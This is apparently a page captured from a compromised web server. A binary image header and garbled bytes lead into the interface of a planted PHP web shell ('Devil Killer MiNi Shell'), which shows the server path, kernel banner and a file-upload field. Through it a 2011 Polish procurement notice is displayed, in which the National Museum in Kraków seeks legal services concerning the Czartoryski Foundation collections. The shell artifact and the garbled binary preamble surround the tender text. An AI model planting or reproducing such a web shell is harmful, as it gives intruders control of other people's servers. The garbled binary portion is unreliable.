JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/445052-N-2011.html

<p class="kh_header"><b>Kraków: Świadczenie pomocy prawnej dla Muzeum Narodowego  w Krakowie w zakresie stosunków prawnych z Fundacją Książąt Czartoryskich w Krakowie oraz innych zagadnień występujących na gruncie opieki nad zbiorami Muzeum i Biblioteki Książąt Czartoryskich.</b><br>
<b>Numer ogłoszenia: 445052 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 012 2955621, faks 012 2955555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie pomocy prawnej dla Muzeum Narodowego  w Krakowie w zakresie stosunków prawnych z Fundacją Książąt Czartoryskich w Krakowie oraz innych zagadnień występujących na gruncie opieki nad zbiorami Muzeum i Biblioteki Książąt Czartoryskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia:
Świadczenie pomocy prawnej dla Muzeum Narodowego w Krakowie w zakresie stosunków prawnych z Fundacją Książąt Czartoryskich w Krakowie oraz innych zagadnień występujących na gruncie opieki nad zbiorami Muzeum i Biblioteki Książąt Czartoryskich.

Fundacja Książąt Czartoryskich wpisana jest do Rejestru stowarzyszeń, innych organizacji społecznych i zawodowych, fundacji i publicznych zakładów opieki zdrowotnej prowadzonego przez Sąd Rejonowy dla Krakowa - Śródmieścia w Krakowie, XI Wydział Gospodarczy KRS pod nr 82194.

Fundację łączą z Muzeum Narodowym w Krakowie trzy umowy zawarte w dniu 31 marca 2005 r.:
a) umowa o współpracę - stanowiąca kontynuację współpracy zapoczątkowane umową o zarząd,
b) umowa depozytu, której celem jest udostępnienie zbiorów Fundacji społeczeństwu poprzez złożenie ich w depozyt Muzeum Narodowemu w Krakowie i na podstawie której Muzeum zobowiązuje się sprawować pieczę nad ok. 87 000 obiektów oraz ok. 300.000 jednostek bibliotecznych wchodzących w skład zbiorów Fundacji. W ramach sprawowania tej pieczy, Muzeum m.in. realizuje wypożyczenia obiektów na rzecz innych podmiotów, w tym instytucji zagranicznych.
c) umowa najmu nieruchomości położonej w Krakowie składającej się z czterech działek zabudowanych budynkami przy ul. Jana 19, Pijarskiej 6,  Pijarskiej 8 i Pijarskiej 15, zawartą w celu zachowania integralności zbiorów Fundacji.        
Umowy te nie regulują ostatecznie zasad współpracy pomiędzy Muzeum a Fundacją. 
W  ramach świadczenia przez Wykonawcę pomocy prawnej może pojawić się  konieczność ich renegocjowania lub wprowadzenia nowych umów regulujących tą współpracę.
Obecnie w Pałacu Książąt Czartoryskich, siedzibie Muzeum Książąt  Czartoryskich, prowadzony jest remont a kolekcja zbiorów jest rozproszona i eksponowana w innych instytucjach na terenie kraju jak również poza jego  granicami.
Celem prowadzonego remontu budynku jest otwarcie nowej ekspozycji co wiąże się  koniecznością wypracowania formalno-prawnych  aspektów  funkcjonowania nowo otwartego Muzeum.
Obecna sytuacja prawna pomiędzy Muzeum  a Fundacją ma charakter dynamiczny i zależna jest m.in. od działań i decyzji Fundacji oraz Ministerstwa Kultury i Dziedzictwa Narodowego. 
Wykonawca zobowiązany jest do pełnej dyspozycyjności, szybkiego i efektywnego rozwiązywania  zgłaszanych problemów.

 Szczegółowy zakres zamówienia

a) pomoc prawna w zakresie:
 - analizy dokumentacji, 
- przygotowywania projektów pism,
- przygotowywania projektów umów,
- czynności mających na celu regulowanie stanu prawnego, 
- spraw związanych z działaniami spadkobierców dawnych właścicieli zbiorów Muzeum i Biblioteki Książąt Czartoryskich oraz Fundacji Książąt Czartoryskich,

b) 
- uczestnictwo w spotkaniach z organami władz państwowych i samorządowych, z przedstawicielami Fundacji Książąt Czartoryskich, 
- uczestnictwo w rokowaniach,
- uczestnictwo w negocjowaniu warunków umów i porozumień, 

c) 
- konsultacje prawne w siedzibie zamawiającego i w innej formie, w szczególności: konsultacje prawne telefoniczne, mailowe,
- sporządzanie pisemnych opinii, 
- przygotowywanie projektów pism i umów,
- udzielanie porad i wyjaśnień, 
- bieżące doradztwo prawne,

Wymaga się, aby w celu wypełniania powyższych obowiązków, Wykonawca zapewnił w trakcie trwania umowy obecność wskazanego w ofercie radcy prawnego/adwokata. 
W czasie jego usprawiedliwionej nieobecności, wymaga się wyznaczenia jego imiennego zastępstwa zaakceptowanego przez Zamawiającego.
Wymaga się aby Wykonawca, w celu wypełniania powyższych obowiązków, 1 raz w miesiącu odbył spotkanie z zamawiającym na jego  wniosek lub uczestniczył w spotkaniu w miejscu wskazanym przez zamawiającego. Zamawiający i Wykonawca będą uzgadniać każdorazowo termin spotkania, na bieżąco, w zależności od potrzeb.  
Pozostałe czynności  wykonawca świadczy za pośrednictwem poczty elektronicznej lub telefonu.
Na koniec każdego miesiąca, Wykonawca będzie przedstawiał Zamawiającemu do akceptacji protokół z wykonanych czynności.

Wynagrodzenie obejmuje:

1) świadczenie pomocy prawnej za pośrednictwem poczty elektronicznej lub telefonu/ fax,
2) 1 dzień w miesiącu - świadczenie pomocy prawnej w siedzibie zamawiającego lub innym miejscu wskazanym przez Zamawiającego (terytorium RP) oraz związane z tym koszty przejazdu i ew. noclegów. Koszty  związane z dodatkowym pobytem Wykonawcy w siedzibie zamawiającego lub innym wskazanym przez Niego miejscu w celu odbycia spotkania na wniosek zamawiającego rozliczane będą w następujący  sposób:
- koszty dojazdu i ewentualnych noclegów według dowodów poniesionych wydatków (przy czym  zastrzega się aby wykonawca uzgodnił wysokość wydatków przed ich poniesieniem z zamawiającym),
- koszty pomocy prawnej na podstawie faktycznej ilości godzin przepracowanych na rzecz Muzeum według stawki  godzinowej określonej przez Wykonawcę w ofercie.
3) koszt materiałów zużytych do świadczenia usługi,
4) koszty poniesione przez wykonawcę w związku z przygotowaniem opinii, wyjaśnień..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać iż osoby realizujące zamówienie posiadają następujące kwalifikacje zawodowe,  doświadczenie i  wykształcenie niezbędne do wykonywania zamówienia:
a.1.  radca prawny lub adwokat posiada uprawnienia radcy prawnego lub adwokata do wykonywania zawodu;
a.2. w okresie ostatnich pięciu lat przed upływem terminu składania ofert wskazany do realizacji zamówienia radca prawny lub adwokat sporządził co najmniej trzy pisemne opinie prawne, 
dla każdego z podanych poniżej zakresów:
-    	ustawy o fundacjach dotyczące problematyki zbiorów muzealnych, dzieł sztuki lub zabytków, 
-    	ustawy partnerstwie publiczno - prywatnym,
- 	ustawy o muzeach/ ustawy o zabytkach/ ustawy o prowadzeniu działalności kulturalnej. 

Powyższe kwalifikacje mogą być przypisane jednej osobie (radca prawny/adwokat) lub Wykonawca wskazuje dwie/trzy osoby realizujące zamówienie (radca prawny i/lub adwokat).

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie. Ocena spełnienia warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać że jest  ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 500.000 PLN od jednego zdarzenia. Na potwierdzenie ww. warunku Wykonawca składa opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 500.000 zł. od jednego zdarzenia.


W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie.

Ocena spełnienia warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie Wykonawcy - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku  do treści oferty poza przewidzianymi w niniejszym ogłoszeniu.

Warunki i okoliczności uprawniające do wniosku o zmianę.

 1. Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy w zakresie:

a)	terminów  realizacji zamówienia. Zmiana może dotyczyć skrócenia lub  wydłużenia maks. o dwa miesiące terminu realizacji  zamówienia. Zmiana terminu nie może być spowodowana zwłoką ze strony  Wykonawcy  w realizacji  zamówienia. W przypadku  skrócenia terminu realizacji zamówienia Zamawiający  zobowiązany jest powiadomić o tym fakcie Wykonawcę  na co najmniej 30 dni przed wprowadzeniem zmiany. Wykonawcy nie przysługuję żądanie jakichkolwiek kosztów z tytułu skrócenia terminu  realizacji  zamówienia. W przypadku przedłużenia terminu  realizacji  zamówienia Wykonawcy przysługuje wynagrodzenie  porównywalne według cen podanych  w ofercie;
b)	zakresu zamówienia. Zamawiający  może wprowadzić zmianę w umowie dotycząca wykonania w ramach  wskazanych w przedmiocie umowy obszarów prawnych czynności niezbędnych do  świadczenia pomocy prawnej nie wymienionych  w zał. nr 1 specyfikacji). Zmiana w powyższym zakresie nie może skutkować zmianą ceny umownej;
c)	sposobu realizacji zamówienia o ile wpływa ona pozytywnie na realizację umowy dla obydwu stron (np. sposobu rozliczania wynagrodzenia wykonawcy). Przy czym niezmienny pozostaje ryczałtowy charakter wynagrodzenia Wykonawcy;
d)	ceny  w przypadku ustawowej  zmiany stawki podatku VAT. W przypadku  ustawowej zmiany  stawki podatku VAT cena netto pozostaje niezmienna;
e)	osób realizujących  zamówienie (przy czym osoby te nie mogą mieć kwalifikacji niższych od wskazanych w ofercie Wykonawcy). W powyższym przypadku wymagana jest zgoda zamawiającego.



2. Wniosek o zmianę z zastrzeżeniem pkt 1.a musi wpłynąć do Zamawiającego lub Wykonawcy
 w terminie minimum 3 dni przed planowanym wprowadzeniem zmian, pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MUZEUM  NARODOWE  W  KRAKOWIE,  al. 3-go  Maja 1,  30-062 Kraków,pok 050.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 10:00, miejsce: MUZEUM  NARODOWE  W  KRAKOWIE,  al. 3-go  Maja 1,  30-062 Kraków,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com